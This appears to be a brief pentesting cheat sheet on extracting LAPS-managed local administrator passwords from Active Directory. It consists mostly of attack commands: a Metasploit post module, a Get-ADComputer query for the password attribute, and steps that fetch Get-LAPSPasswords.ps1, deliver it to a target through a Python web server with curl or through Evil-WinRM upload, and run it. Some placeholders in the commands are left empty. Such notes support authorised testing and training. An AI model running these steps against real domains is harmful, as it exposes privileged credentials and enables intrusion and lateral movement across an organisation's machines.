# LAPS (Local Administrator Password Solution) Pentesting LAPS provides management of local account passwords of domain joined computers. Passwords are stored in Active Directory. ### Enumeration ``` msfconsole use post/windows/gather/credentials/enum_laps set session 2 exploit ``` ### Obtain Administrator's Password First, check if you are in the **LAPS\_Readers** group. ``` net user # Global Group memberships *LAPS_Readers ``` #### Using Get-ADComputer **Get-ADComputer** gets the information of the Active Directory computer. ``` Get-ADComputer -Identity '' -property 'ms-mcs-admpwd' ``` #### Using Get-LAPSPasswords.ps1 1. **Download the Payload in Local Machine** If you are in LAPS\_Readers, you can get the administrator's password using [**Get-LAPSPasswords.ps1**](https://github.com/kfosaaen/Get-LAPSPasswords/blob/master/Get-LAPSPasswords.ps1)**{:target="\_blank"}{:rel="noopener"}**. ``` wget https://github.com/kfosaaen/Get-LAPSPasswords/blob/master/Get-LAPSPasswords.ps1 ``` 2. **Transfer the Payload to Target Machine** * **via PowerShell** First off, open web server in local machine. ``` python3 -m http.server 8000 ``` Then curl in target machine ``` curl http://:8000/Get-LAPSPasswords.ps1 -o .\Get-LAPSPasswords.ps1 ``` * **via Evil-WinRM** If you connect the remote Windows machine with Evil-WinRM, you can use directly by adding **-s** flag when connecting. ``` evil-winrm -i -u username -p password -s /path/to/current/directory ``` Then just execute the payload in evil-winrm console. ``` PS > upload .\Get-LAPSPasswords.ps1 c:\Users\\Desktop\Get-LAPSPasswords.ps1 ``` 3. **Execute the Payload in Target Machine** ``` .\Get-LAPSPasswords.ps1 ```